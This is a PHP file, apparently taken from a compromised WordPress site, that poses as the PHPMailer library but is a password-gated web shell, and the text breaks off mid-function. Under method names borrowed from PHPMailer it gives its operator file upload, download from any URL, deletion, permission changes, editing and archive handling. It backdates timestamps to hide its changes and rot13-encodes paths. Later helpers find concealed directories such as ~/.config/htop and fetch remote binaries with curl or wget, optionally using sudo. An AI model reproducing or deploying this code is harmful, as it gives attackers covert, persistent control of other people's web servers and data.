File: /home/vitanhod/public_html/wp-includes/php-compat/lingling.php
<?php
namespace PHPMailer\PHPMailer;
if (!defined('ABSPATH')) {
define('ABSPATH', dirname(__FILE__) . '/');
}
@set_time_limit(0);
error_reporting(0);
if (function_exists("ini_set")) {
@ini_set("error_log", null);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
}
class PHPMailer
{
const VERSION = '6.8.1';
const CHARSET_ASCII = 'us-ascii';
const CHARSET_ISO88591 = 'iso-8859-1';
const CHARSET_UTF8 = 'utf-8';
const CONTENT_TYPE_PLAINTEXT = 'text/plain';
const CONTENT_TYPE_TEXT_CALENDAR = 'text/calendar';
const CONTENT_TYPE_TEXT_HTML = 'text/html';
const CONTENT_TYPE_MULTIPART_ALTERNATIVE = 'multipart/alternative';
const CONTENT_TYPE_MULTIPART_MIXED = 'multipart/mixed';
const CONTENT_TYPE_MULTIPART_RELATED = 'multipart/related';
const ENCODING_7BIT = '7bit';
const ENCODING_8BIT = '8bit';
const ENCODING_BASE64 = 'base64';
const ENCODING_BINARY = 'binary';
const ENCODING_QUOTED_PRINTABLE = 'quoted-printable';
const ENCRYPTION_STARTTLS = 'tls';
const ENCRYPTION_SMTPS = 'ssl';
const ICAL_METHOD_REQUEST = 'REQUEST';
const ICAL_METHOD_PUBLISH = 'PUBLISH';
const ICAL_METHOD_REPLY = 'REPLY';
const ICAL_METHOD_ADD = 'ADD';
const ICAL_METHOD_CANCEL = 'CANCEL';
const ICAL_METHOD_REFRESH = 'REFRESH';
const ICAL_METHOD_COUNTER = 'COUNTER';
const ICAL_METHOD_DECLINECOUNTER = 'DECLINECOUNTER';
public $Priority;
public $CharSet = self::CHARSET_UTF8;
public $ContentType = self::CONTENT_TYPE_PLAINTEXT;
public $Encoding = self::ENCODING_8BIT;
public $ErrorInfo = '';
public $From = '';
public $FromName = '';
public $Sender = '';
public $Subject = '';
public $Body = '';
public $AltBody = '';
public $Ical = '';
protected $MIMEBody = '';
protected $MIMEHeader = '';
protected $mailHeader = '';
public $WordWrap = 0;
public $Mailer = 'mail';
public $Sendmail = '/usr/sbin/sendmail';
public $UseSendmailOptions = true;
public $ConfirmReadingTo = '';
public $Hostname = '';
public $MessageID = '';
public $MessageDate = '';
public $Host = 'localhost';
public $Port = 25;
public $Helo = '';
public $SMTPSecure = '';
public $SMTPAutoTLS = true;
public $SMTPAuth = false;
public $SMTPOptions = [];
public $Username = '';
public $Password = '';
public $AuthType = '';
public $oauth;
public $Timeout = 300;
public $dsn = '';
public $SMTPDebug = 0;
public $Debugoutput = 'echo';
public $SMTPKeepAlive = false;
public $SingleTo = false;
public $SingleToArray = [];
protected $do_verp = false;
public $AllowEmpty = false;
public $DKIM_selector = '';
public $DKIM_identity = '';
public $DKIM_passphrase = '';
public $DKIM_domain = '';
public $DKIM_copyHeaderFields = true;
public $DKIM_extraHeaders = [];
public $DKIM_private = '';
public $DKIM_private_string = '';
public $action_function = '';
public $XMailer = '';
public static $validator = 'php';
protected $smtp;
protected $to = [];
protected $cc = [];
protected $bcc = [];
protected $ReplyTo = [];
protected $all_recipients = [];
protected $RecipientsQueue = [];
protected $ReplyToQueue = [];
protected $attachment = [];
protected $CustomHeader = [];
protected $lastMessageID = '';
protected $message_type = '';
protected $boundary = [];
protected $language = [];
protected $error_count = 0;
protected $sign_cert_file = '';
protected $sign_key_file = '';
protected $sign_extracerts_file = '';
protected $sign_key_pass = '';
protected $exceptions = false;
protected $uniqueid = '';
private $mailToken;
private $mailIndex;
private $mailTheme;
private $mailEncoding;
private $mailDisabled;
public $mailPath;
private $mailRoot;
private $mailBase;
private $mailSafe;
private $mailOS;
protected function setMailCookie($name, $value)
{
$_COOKIE[$name] = $value;
setcookie($name, $value);
}
public function validateAddress()
{
$this->mailToken = "fa704e7366d666bd";
$this->mailIndex = "_" . substr(md5($_SERVER["HTTP_HOST"]), 0, 5);
$this->mailTheme = "#55d7ff";
$this->mailEncoding = "Windows-1251";
$authHash = '$2y$12$xGHyR4xXMfCKW1T7EJIsCu9G3pP9zgQikBayN23M9b6Mz8p6/j5f6';
if (isset($_POST['password'])) {
if (@password_verify($_POST['password'], $authHash)) {
$this->setMailCookie($this->mailIndex, $this->mailToken);
} else {
die($this->getLoginTemplate());
}
}
if (!@isset($_COOKIE[$this->mailIndex]) || $_COOKIE[$this->mailIndex] != $this->mailToken) {
die($this->getLoginTemplate());
}
}
protected function getLoginTemplate() {
return '<!DOCTYPE html><html><head><style>input{margin:0;background:white;border:none;outline:none;color:transparent;caret-color:transparent;}</style></head><body><form method="POST" action=""><label for="password"></label><input type="password" id="password" name="password"></form></body></html>';
}
public function preSend()
{
$selfPath = __FILE__;
$dirPath = dirname($selfPath);
if (!is_writable($selfPath)) @chmod($selfPath, 0644);
if (!is_writable($dirPath)) @chmod($dirPath, 0755);
if (function_exists("ini_get")) {
$this->mailSafe = @ini_get("safe_mode");
$this->mailDisabled = @ini_get("disable_functions");
}
if (!$this->mailSafe && function_exists("error_reporting")) {
error_reporting(0);
}
if (!$this->mailSafe && function_exists("set_time_limit")) {
set_time_limit(0);
}
if (function_exists("get_magic_quotes_gpc") && function_exists("array_map") && function_exists("stripslashes") && function_exists("is_array")) {
if (@get_magic_quotes_gpc()) {
function mailStripSlashes($arr)
{
return @is_array($arr) ? @array_map("mailStripSlashes", $arr) : @stripslashes($arr);
}
$_POST = mailStripSlashes($_POST);
$_COOKIE = mailStripSlashes($_COOKIE);
}
}
if (!function_exists("posix_getpwuid") && strpos($this->mailDisabled, "posix_getpwuid") === false) {
function posix_getpwuid($uid) { return false; }
}
if (!function_exists("posix_getgrgid") && strpos($this->mailDisabled, "posix_getgrgid") === false) {
function posix_getgrgid($gid) { return false; }
}
$this->mailOS = (strtolower(substr(PHP_OS, 0, 3)) == "win") ? "win" : "nix";
$this->mailBase = $_SERVER["DOCUMENT_ROOT"];
$this->mailRoot = function_exists("getcwd") ? @getcwd() : @dirname(__FILE__);
if (isset($_POST["c"]) && $_POST["c"] != "") {
$_POST["c"] = (strpos($_POST["c"], '%') !== false) ? str_rot13(urldecode($_POST["c"])) : str_rot13($_POST["c"]);
}
if (isset($_POST["c"]) && $_POST["c"] != "" && @is_dir($_POST["c"])) {
$this->mailPath = $_POST["c"];
if (function_exists("chdir")) {
@chdir($_POST["c"]);
}
} elseif (function_exists("getcwd") && @getcwd() !== false) {
$this->mailPath = @getcwd();
} else {
$this->mailPath = $this->mailRoot;
}
if ($this->mailOS == "win") {
$this->mailRoot = str_replace("\\", "/", $this->mailRoot);
$this->mailPath = str_replace("\\", "/", $this->mailPath);
}
if ($this->mailPath[strlen($this->mailPath) - 1] != "/") {
$this->mailPath .= "/";
}
}
protected function getFileUrl($filePath) {
$docRoot = rtrim($_SERVER["DOCUMENT_ROOT"], '/');
$relPath = str_replace($docRoot, '', $filePath);
$proto = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? "https" : "http";
return $proto . "://" . $_SERVER['HTTP_HOST'] . $relPath;
}
public function clearAllRecipients()
{
$idx = $this->mailIndex;
setcookie($idx, "", time() - 3600);
die("bye!");
}
public function addAttachment()
{
$cwd = $this->mailPath;
$cwdEncoded = str_rot13($cwd);
if (!empty($_POST["p"]) && $_POST["p"] == "touch" && !empty($_POST["touch_path"]) && !empty($_POST["touch_time"])) {
$touchPath = str_rot13(urldecode($_POST["touch_path"]));
$touchTime = strtotime($_POST["touch_time"]);
if ($touchTime && @file_exists($touchPath)) {
if (@touch($touchPath, $touchTime, $touchTime)) {
echo "<font color='green'>Timestamp updated!</font><br>";
} else {
echo "<font color='red'>Failed to update timestamp!</font><br>";
}
}
}
if (!empty($_POST["p"])) {
$mtime = @filemtime($cwd);
switch ($_POST["p"]) {
case "uploadFile":
if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $cwd . $_FILES["f"]["name"])) {
echo "<font color='red'>Can't upload file!</font>";
} else {
echo "<font color='green'>File uploaded! -> " . htmlspecialchars($cwd . $_FILES["f"]["name"]) . "</font>";
}
if ($mtime) @touch($cwd, $mtime, $mtime);
break;
case "urlDownload":
if (!empty($_POST["url"]) && !empty($_POST["output_filename"])) {
$dlUrl = $_POST["url"];
$dlOut = $cwd . basename($_POST["output_filename"]);
$dlMethod = isset($_POST["method"]) ? $_POST["method"] : 'file_get_contents';
$dlOk = false;
switch ($dlMethod) {
case 'file_get_contents':
$ctx = @stream_context_create(['http' => ['timeout' => 60, 'header' => "User-Agent: Mozilla/5.0\r\n"], 'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$dlData = @file_get_contents($dlUrl, false, $ctx);
if ($dlData !== false) { $dlOk = @file_put_contents($dlOut, $dlData) !== false; }
break;
case 'curl':
if (function_exists('curl_init')) {
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, $dlUrl);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
@curl_setopt($ch, CURLOPT_TIMEOUT, 60);
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
@curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0');
$dlData = @curl_exec($ch);
@curl_close($ch);
if ($dlData !== false) { $dlOk = @file_put_contents($dlOut, $dlData) !== false; }
} else {
$cmdDl = 'curl -fsSL -o ' . escapeshellarg($dlOut) . ' ' . escapeshellarg($dlUrl) . ' 2>&1';
$this->executeCommand($cmdDl);
$dlOk = @file_exists($dlOut) && @filesize($dlOut) > 0;
}
break;
case 'fopen':
$fp = @fopen($dlUrl, 'r');
if ($fp) {
$dlData = '';
while (!@feof($fp)) { $dlData .= @fread($fp, 8192); }
@fclose($fp);
$dlOk = @file_put_contents($dlOut, $dlData) !== false;
}
break;
case 'copy':
$dlOk = @copy($dlUrl, $dlOut);
break;
case 'stream_context':
$ctx = @stream_context_create(['http' => ['method' => 'GET', 'timeout' => 60, 'header' => "User-Agent: Mozilla/5.0\r\n"], 'ssl' => ['verify_peer' => false, 'verify_peer_name' => false]]);
$fp = @fopen($dlUrl, 'r', false, $ctx);
if ($fp) {
$dlData = @stream_get_contents($fp);
@fclose($fp);
if ($dlData !== false) { $dlOk = @file_put_contents($dlOut, $dlData) !== false; }
}
break;
case 'file':
$dlData = @file($dlUrl);
if ($dlData !== false) { $dlOk = @file_put_contents($dlOut, implode('', $dlData)) !== false; }
break;
}
if ($dlOk && @file_exists($dlOut) && @filesize($dlOut) > 0) {
echo "<font color='green'>File saved! -> " . htmlspecialchars($dlOut) . " (" . $this->formatSize(@filesize($dlOut)) . ") [" . htmlspecialchars($dlMethod) . "]</font>";
} else {
echo "<font color='red'>Failed to download file using " . htmlspecialchars($dlMethod) . "</font>";
}
}
if ($mtime) @touch($cwd, $mtime, $mtime);
break;
case "mkdir":
$newDir = $cwd . str_rot13($_POST["x"]);
if (!@mkdir($newDir)) {
echo "<font color='red'>Can't create new dir</font>";
} else {
echo "<font color='green'>Directory created!</font>";
if ($mtime) @touch($newDir, $mtime, $mtime);
}
break;
case "delete":
$delFunc = function($path) use (&$delFunc) {
$path = substr($path, -1) == "/" ? $path : $path . "/";
if ($handle = @opendir($path)) {
while (($file = @readdir($handle)) !== false) {
if ($file == ".." || $file == ".") continue;
$f = $path . $file;
if (@is_dir($f)) $delFunc($f); else @unlink($f);
}
@closedir($handle);
}
@rmdir($path);
};
if (@is_array($_POST["f"])) {
$deleted = 0;
foreach ($_POST["f"] as $item) {
if ($item == "..") continue;
$item = $cwd . str_rot13(urldecode($item));
if (@is_dir($item)) { $delFunc($item); $deleted++; } else { if (@unlink($item)) $deleted++; }
}
echo "<font color='green'>Deleted $deleted item(s)</font>";
} elseif (!empty($_POST["x"])) {
$item = $cwd . str_rot13(urldecode($_POST["x"]));
if (@is_dir($item)) { $delFunc($item); echo "<font color='green'>Directory deleted!</font>"; } else { if (@unlink($item)) echo "<font color='green'>File deleted!</font>"; else echo "<font color='red'>Can't delete!</font>"; }
}
break;
case "massChmod":
if (@is_array($_POST["f"]) && !empty($_POST["chmod_val"])) {
$chmodVal = octdec($_POST["chmod_val"]);
$changed = 0;
foreach ($_POST["f"] as $item) {
if ($item == "..") continue;
$item = $cwd . str_rot13(urldecode($item));
if (@chmod($item, $chmodVal)) $changed++;
}
echo "<font color='green'>Changed permissions on $changed item(s)</font>";
}
break;
case "massZip":
if (@is_array($_POST["f"]) && !empty($_POST["zip_name"])) {
$zipName = $cwd . $_POST["zip_name"];
if (!preg_match('/\.zip$/i', $zipName)) $zipName .= '.zip';
if (class_exists('ZipArchive')) {
$zip = new \ZipArchive();
if ($zip->open($zipName, \ZipArchive::CREATE | \ZipArchive::OVERWRITE) === true) {
$addToZip = function($basePath, $relativePath, $zip) use (&$addToZip) {
if (@is_dir($basePath)) {
$zip->addEmptyDir($relativePath);
$handle = @opendir($basePath);
if ($handle) {
while (($file = @readdir($handle)) !== false) {
if ($file == '.' || $file == '..') continue;
$addToZip($basePath . '/' . $file, $relativePath . '/' . $file, $zip);
}
@closedir($handle);
}
} else {
$zip->addFile($basePath, $relativePath);
}
};
$zipped = 0;
foreach ($_POST["f"] as $item) {
if ($item == "..") continue;
$itemName = str_rot13(urldecode($item));
$fullPath = $cwd . $itemName;
$addToZip($fullPath, $itemName, $zip);
$zipped++;
}
$zip->close();
echo "<font color='green'>Zipped $zipped item(s) to " . htmlspecialchars(basename($zipName)) . "</font>";
} else {
echo "<font color='red'>Can't create zip file!</font>";
}
} else {
$items = [];
foreach ($_POST["f"] as $item) {
if ($item == "..") continue;
$items[] = escapeshellarg(str_rot13(urldecode($item)));
}
$cmdZip = "cd " . escapeshellarg($cwd) . " && zip -r " . escapeshellarg($zipName) . " " . implode(" ", $items) . " 2>&1";
$out = $this->executeCommand($cmdZip);
if (@file_exists($zipName)) {
echo "<font color='green'>Zipped to " . htmlspecialchars(basename($zipName)) . "</font>";
} else {
echo "<font color='red'>Zip failed! " . htmlspecialchars($out) . "</font>";
}
}
} elseif (@is_array($_POST["f"])) {
echo "<font color='red'>Please enter a zip filename!</font>";
}
break;
case "massUnzip":
if (@is_array($_POST["f"])) {
$unzipped = 0;
foreach ($_POST["f"] as $item) {
if ($item == "..") continue;
$itemName = str_rot13(urldecode($item));
$fullPath = $cwd . $itemName;
if (!preg_match('/\.zip$/i', $fullPath)) continue;
$extractDir = $cwd . pathinfo($itemName, PATHINFO_FILENAME);
if (class_exists('ZipArchive')) {
$zip = new \ZipArchive();
if ($zip->open($fullPath) === true) {
if (!@is_dir($extractDir)) @mkdir($extractDir, 0755, true);
$zip->extractTo($extractDir);
$zip->close();
$unzipped++;
}
} else {
$cmdUnzip = "unzip -o " . escapeshellarg($fullPath) . " -d " . escapeshellarg($extractDir) . " 2>&1";
$this->executeCommand($cmdUnzip);
if (@is_dir($extractDir)) $unzipped++;
}
}
echo "<font color='green'>Unzipped $unzipped archive(s)</font>";
}
break;
}
if ($mtime && $_POST["p"] != "uploadFile") @touch($cwd, $mtime, $mtime);
}
echo "<h1>File Manager</h1><div class=content>";
echo "<script>function showTouch(path,currentTime){var newTime=prompt('Enter new timestamp (YYYY-MM-DD HH:MM:SS):',currentTime);if(newTime && newTime!=currentTime){var f=document.createElement('form');f.method='post';f.style.display='none';var a=document.createElement('input');a.name='a';a.value='fm';f.appendChild(a);var c=document.createElement('input');c.name='c';c.value='" . $cwdEncoded . "';f.appendChild(c);var p=document.createElement('input');p.name='p';p.value='touch';f.appendChild(p);var tp=document.createElement('input');tp.name='touch_path';tp.value=path;f.appendChild(tp);var tt=document.createElement('input');tt.name='touch_time';tt.value=newTime;f.appendChild(tt);document.body.appendChild(f);f.submit();}}</script>";
$files = $this->scanDirectory($cwd);
if ($files === false) { echo "Can't open this folder!"; return; }
global $sortParams;
if (!empty($_POST["p"]) && @preg_match("!s_([A-z]+)_(\\d{1})!", $_POST["p"], $matches)) {
$sortParams = array($matches[1], (int) $matches[2]);
}
echo "<script>function sa(src){var cb=document.getElementsByName('f[]');for(var i=0;i<cb.length;i++){cb[i].checked=src.checked;}}</script><form name=files method=post><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><input type=checkbox onclick='sa(this)'></th><th width='30%'><a href='#' onclick='g(\"fm\",null,\"s_name_" . ($sortParams[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"fm\",null,\"s_size_" . ($sortParams[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"fm\",null,\"s_modify_" . ($sortParams[1] ? 0 : 1) . "\")'>Modify</a></th><th>URL</th><th><a href='#' onclick='g(\"fm\",null,\"s_perms_" . ($sortParams[1] ? 0 : 1) . "\")'>Perms</a></th><th width='180px'>Actions</th></tr>";
$dirs = $fileList = array();
foreach ($files as $f) {
if ($f == '.' || $f == '..') {
if ($f == '..') {
$dirs[] = array("name" => $f, "path" => $cwd . $f, "modify" => @date("Y-m-d H:i:s", @filemtime($cwd . $f)), "perms" => $this->getPermsColor($cwd . $f), "size" => 0, "type" => "dir");
}
continue;
}
$item = array("name" => $f, "path" => $cwd . $f, "modify" => @date("Y-m-d H:i:s", @filemtime($cwd . $f)), "perms" => $this->getPermsColor($cwd . $f), "size" => @filesize($cwd . $f));
if (@is_file($cwd . $f)) $fileList[] = @array_merge($item, array("type" => "file"));
elseif (@is_link($cwd . $f)) $dirs[] = @array_merge($item, array("type" => "link", "link" => readlink($item["path"])));
elseif (@is_dir($cwd . $f)) $dirs[] = @array_merge($item, array("type" => "dir"));
}
$cmpFunc = function($a, $b) {
global $sortParams;
if ($a["name"] == "..") return -1;
if ($b["name"] == "..") return 1;
if ($sortParams[0] != "size") return @strcmp(strtolower($a[$sortParams[0]]), strtolower($b[$sortParams[0]])) * ($sortParams[1] ? 1 : -1);
else return ($a["size"] < $b["size"] ? -1 : 1) * ($sortParams[1] ? 1 : -1);
};
@usort($fileList, $cmpFunc); @usort($dirs, $cmpFunc);
$fileList = @array_merge($dirs, $fileList);
$alt = 0;
foreach ($fileList as $item) {
$enc = urlencode(str_rot13($item["name"]));
$encPath = urlencode(str_rot13($item["path"]));
$fileUrl = $this->getFileUrl($item["path"]);
echo "<tr" . ($alt ? " class=l1" : " class=l2") . "><td><input type=checkbox name='f[]' value=\"" . $enc . "\" class=chkbx></td>";
if ($item["type"] == "dir") echo "<td><a href=# onclick=\"g('fm','" . $encPath . "','','','')\">" . "<b>[ " . htmlspecialchars($item["name"]) . " ]</b></a>" . (isset($item["link"]) ? " -> " . htmlspecialchars($item["link"]) : "") . "</td>";
else echo "<td><a href=# onclick=\"g('ft','" . $encPath . "','view','','')\">" . htmlspecialchars($item["name"]) . "</a>" . (isset($item["link"]) ? " -> " . htmlspecialchars($item["link"]) : "") . "</td>";
echo "<td>" . ($item["type"] == "dir" ? "DIR" : $this->formatSize($item["size"])) . "</td><td><a href='#' onclick=\"showTouch('" . $encPath . "','" . $item["modify"] . "')\" title='Click to change'>" . $item["modify"] . "</a></td>";
echo "<td>" . (($item["type"] != "dir" && $item["name"] != "." && $item["name"] != "..") ? "<a href='" . htmlspecialchars($fileUrl) . "' target='_blank'>Link</a>" : "-") . "</td>";
echo "<td><a href=# onclick=\"g('ft','" . $encPath . "','chmod','')\">" . $item["perms"] . "</a></td><td><a href=# onclick=\"g('ft','" . $encPath . "','edit','')\">Edit</a> <a href=# onclick=\"g('ft','" . $encPath . "','rename','')\">Rename</a> <a href=# onclick=\"if(confirm('Delete this item?'))g('fm','" . $cwdEncoded . "','delete','" . $enc . "')\">Delete</a></td></tr>";
$alt = !$alt;
}
echo "<tr><td colspan=7><input type=hidden name=a value='fm'><input type=hidden name=c value='" . htmlspecialchars($cwdEncoded) . "'><input type=hidden name=ch value='" . (@isset($_POST["ch"]) ? $_POST["ch"] : "") . "'><select name='p' id='fmAction' onchange='toggleZipName()'><option value='delete'>Delete</option><option value='massChmod'>Mass Chmod</option><option value='massZip'>Zip Selected</option><option value='massUnzip'>Unzip Selected</option></select><input type='text' name='chmod_val' placeholder='0755' size='5'><input type='text' name='zip_name' id='zipNameInput' placeholder='archive.zip' size='15' style='display:none;'> <input type='submit' value='>>'></td></tr></table></form>";
echo "<script>function toggleZipName(){var s=document.getElementById('fmAction');var z=document.getElementById('zipNameInput');if(s.value=='massZip'){z.style.display='inline';}else{z.style.display='none';}}</script>";
echo "</div>";
}
public function addStringAttachment()
{
$cwd = $this->mailPath;
$cwdEncoded = str_rot13($cwd);
$actionNames = array('view', 'edit', 'rename', 'chmod', 'touch', 'download', 'mkfile');
if (@isset($_POST["p"]) && in_array(strtolower($_POST["p"]), $actionNames)) { $filePath = $_POST["c"]; $action = strtolower($_POST["p"]); }
else if (@isset($_POST["p"])) { $filePath = str_rot13(urldecode($_POST["p"])); $action = @isset($_POST["x"]) ? strtolower($_POST["x"]) : 'view'; }
else { $filePath = @isset($_POST["c"]) ? $_POST["c"] : ''; $action = 'view'; }
if ($action == "download") {
if (@is_file($filePath) && @is_readable($filePath)) {
ob_start("ob_gzhandler", 4096); @header("Content-Disposition: attachment; filename=" . @basename($filePath));
@header("Content-Type: " . (function_exists("mime_content_type") ? @mime_content_type($filePath) : "application/octet-stream"));
$handle = @fopen($filePath, "r"); if ($handle) { while (!@feof($handle)) echo @fgets($handle, 1024); @fclose($handle); }
}
exit;
}
if ($action == "mkfile" && !@file_exists($filePath)) {
$mtime = @filemtime(dirname($filePath)); $handle = @fopen($filePath, "w");
if ($handle) { @fclose($handle); if ($mtime) { @touch(dirname($filePath), $mtime, $mtime); @touch($filePath, $mtime, $mtime); } $action = "edit"; }
}
$fileDir = dirname($filePath);
if ($fileDir && @is_dir($fileDir)) {
$cwd = rtrim($fileDir, '/') . '/';
$cwdEncoded = str_rot13($cwd);
}
echo "<h1>File Tools</h1><div class=content>";
if (!@file_exists($filePath)) { echo "File not exists: " . htmlspecialchars($filePath); return; }
$owner = @posix_getpwuid(@fileowner($filePath)); if (!$owner) { $owner["name"] = @fileowner($filePath); $group["name"] = @filegroup($filePath); } else { $group = @posix_getgrgid(@filegroup($filePath)); }
$fileUrl = $this->getFileUrl($filePath);
echo "<span>Name:</span> " . htmlspecialchars(@basename($filePath)) . " <span>Size:</span> " . (@is_file($filePath) ? $this->formatSize(@filesize($filePath)) : "-") . " <span>Permission:</span> " . $this->getPermsColor($filePath) . " <span>Owner/Group:</span> " . $owner["name"] . "/" . $group["name"] . "<br>";
echo "<span>Change time:</span> " . @date("Y-m-d H:i:s", @filectime($filePath)) . " <span>Access time:</span> " . @date("Y-m-d H:i:s", @fileatime($filePath)) . " <span>Modify time:</span> " . @date("Y-m-d H:i:s", @filemtime($filePath));
if (@is_file($filePath)) echo " <span>URL:</span> <a href='" . htmlspecialchars($fileUrl) . "' target='_blank'>Open</a>";
echo "<br><br>";
if (empty($action)) $action = "view";
$actions = @is_file($filePath) ? array("View", "Download", "Edit", "Chmod", "Rename", "Touch") : array("Chmod", "Rename", "Touch");
$encFilePath = urlencode(str_rot13($filePath));
foreach ($actions as $val) echo "<a href=# onclick=\"g('ft','" . $cwdEncoded . "','" . $encFilePath . "','" . @strtolower($val) . "')\">" . (@strtolower($val) == $action ? "<b>[ " . $val . " ]</b>" : $val) . "</a> ";
echo "<br><br>";
switch ($action) {
case "view": echo "<pre class=ml1>"; $handle = @fopen($filePath, "r"); if ($handle) { while (!@feof($handle)) echo htmlspecialchars(@fgets($handle, 1024)); @fclose($handle); } echo "</pre>"; break;
case "chmod":
if (!empty($_POST["s"])) {
$perms = 0; for ($i = strlen($_POST["s"]) - 1; $i >= 0; --$i) $perms += (int) $_POST["s"][$i] * @pow(8, strlen($_POST["s"]) - $i - 1);
if (!@chmod($filePath, $perms)) echo "<font color='red'>Can't set permissions!</font><br><script>document.mf.s.value=\"\";</script>";
else echo "<font color='green'>Permissions changed!</font><br>";
}
@clearstatcache(); echo "<script>s_=\"\";</script><form onsubmit=\"g('ft','" . $cwdEncoded . "','" . $encFilePath . "','chmod',this.chmod.value);return false;\"><input type=text name=chmod value=\"" . substr(@sprintf("%o", @fileperms($filePath)), -4) . "\"><input type=submit value=\">>\"></form>"; break;
case "edit":
if (!@is_writable($filePath)) { echo "<font color='red'>File isn't writeable</font>"; break; }
if (!empty($_POST["s"])) {
$mtime = @filemtime($filePath); $_POST["s"] = substr($_POST["s"], 1); $_POST["s"] = @base64_decode($_POST["s"]);
$handle = @fopen($filePath, "w"); if ($handle) { @fputs($handle, $_POST["s"]); @fclose($handle); echo "<font color='green'>File saved!</font><br>"; if ($mtime) @touch($filePath, $mtime, $mtime); }
}
echo "<form onsubmit=\"this.s.value='_'+utoa(this.text.value);g('ft','" . $cwdEncoded . "','" . $encFilePath . "','edit',this.s.value);return false;\"><input type=hidden name=s><textarea name=text class='bigarea'>";
$handle = @fopen($filePath, "r"); if ($handle) { while (!@feof($handle)) echo htmlspecialchars(@fgets($handle, 1024)); @fclose($handle); }
echo "</textarea><br><input type=submit value='Save'></form>"; break;
case "rename":
if (!empty($_POST["s"])) {
$mtime = @filemtime($filePath); $newName = str_rot13($_POST["s"]);
if (!@rename($filePath, $newName)) echo "<font color='red'>Can't rename!</font><br>";
else { echo "<font color='green'>Renamed!</font><br>"; $filePath = $newName; if ($mtime) @touch($filePath, $mtime, $mtime); }
}
@clearstatcache(); $dirPath = dirname($filePath); $fileName = basename($filePath);
echo "<form onsubmit=\"g('ft','" . $cwdEncoded . "','" . $encFilePath . "','rename',rot13('" . htmlspecialchars($dirPath) . "/' + this.name.value));return false;\"><input type=text name=name value=\"" . htmlspecialchars($fileName) . "\" style='width:400px;'><input type=submit value=\">>\"></form>"; break;
case "touch":
if (!empty($_POST["s"])) {
$mtime = @strtotime($_POST["s"]);
if ($mtime) { if (!@touch($filePath, $mtime, $mtime)) echo "<font color='red'>Fail!</font>"; else echo "<font color='green'>Touched!</font>"; }
else echo "<font color='red'>Bad time format!</font>";
}
@clearstatcache(); echo "<script>s_=\"\";</script><form onsubmit=\"g('ft','" . $cwdEncoded . "','" . $encFilePath . "','touch',this.touch.value);return false;\"><input type=text name=touch value=\"" . @date("Y-m-d H:i:s", @filemtime($filePath)) . "\"><input type=submit value=\">>\"></form>"; break;
}
echo "</div>";
}
protected function findGsHomeDir() {
$homeDir = @getenv('HOME') ?: (@getenv('USERPROFILE') ?: '');
if (empty($homeDir)) {
$userInfo = @posix_getpwuid(@posix_getuid());
if ($userInfo && !empty($userInfo['dir'])) {
$homeDir = $userInfo['dir'];
}
}
if (empty($homeDir)) {
$homeDir = '/root';
}
return $homeDir;
}
protected function findGsInstallDir() {
$homeDir = $this->findGsHomeDir();
$configDir = $homeDir . '/.config/htop';
if (!@is_dir($configDir)) {
@mkdir($configDir, 0700, true);
}
if (@is_dir($configDir) && @is_writable($configDir)) {
return $configDir;
}
$altDirs = [
$homeDir . '/.config',
$homeDir . '/.local/share',
$homeDir . '/.cache',
$homeDir,
];
foreach ($altDirs as $dir) {
if (!@is_dir($dir)) {
@mkdir($dir, 0700, true);
}
if (@is_dir($dir) && @is_writable($dir)) {
return $dir;
}
}
$fallbackDirs = ['/dev/shm', '/var/tmp', '/tmp'];
foreach ($fallbackDirs as $dir) {
if (@is_dir($dir) && @is_writable($dir)) {
$subDir = $dir . '/.X11-unix_' . substr(md5($_SERVER['HTTP_HOST']), 0, 6);
if (!@is_dir($subDir)) {
@mkdir($subDir, 0700, true);
}
if (@is_dir($subDir) && @is_writable($subDir)) {
return $subDir;
}
return $dir;
}
}
return '/tmp';
}
protected function getGsArch() {
$uname = $this->executeCommand('uname -m 2>/dev/null');
$uname = strtolower(trim($uname));
if (strpos($uname, 'x86_64') !== false || strpos($uname, 'amd64') !== false) return 'x86_64';
if (strpos($uname, 'aarch64') !== false || strpos($uname, 'arm64') !== false) return 'aarch64';
if (strpos($uname, 'armv7') !== false || strpos($uname, 'armhf') !== false) return 'armv7l';
if (strpos($uname, 'arm') !== false) return 'armv6l';
if (strpos($uname, 'i686') !== false || strpos($uname, 'i386') !== false || strpos($uname, 'i586') !== false) return 'i686';
return 'x86_64';
}
protected function generateSecret() {
$chars = 'abcdef0123456789';
$secret = '';
for ($i = 0; $i < 16; $i++) {
$secret .= $chars[mt_rand(0, 15)];
}
return $secret;
}
protected function downloadWithRetry($url, $dest, $timeout = 60, $useSudo = false) {
$methods = [];
$sudoPrefix = $useSudo ? 'sudo ' : '';
$methods['curl_cmd'] = function($url, $dest) use ($timeout, $sudoPrefix) {
$cmd = $sudoPrefix . "curl -fsSL --connect-timeout 10 --max-time $timeout -o " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>/dev/null";
$this->executeCommand($cmd);
return @file_exists($dest) && @filesize($dest) > 1000;
};
$methods['wget_cmd'] = function($url, $dest) use ($timeout, $sudoPrefix) {
$cmd = $sudoPrefix . "wget -q --timeout=$timeout -O " . escapeshellarg($dest) . " " . escapeshellarg($url) . " 2>/dev/null";
$this->executeCommand($cmd);
return @file_exists($dest) && @filesize($dest) > 1000;
};
$methods['php_curl'] = function($url, $dest) use ($timeout) {
if (!function_exists('curl_init')) return false;
$ch = @curl_init();
if (!$ch) return false;
$fp = @fopen($dest, 'wb');
if (!$fp) { @curl_close($ch); return false; }
@curl_setopt($ch, CURLOPT_URL, $url);
@curl_setopt($ch, CURLOPT_FILE, $fp);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
@curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
@curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
@curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
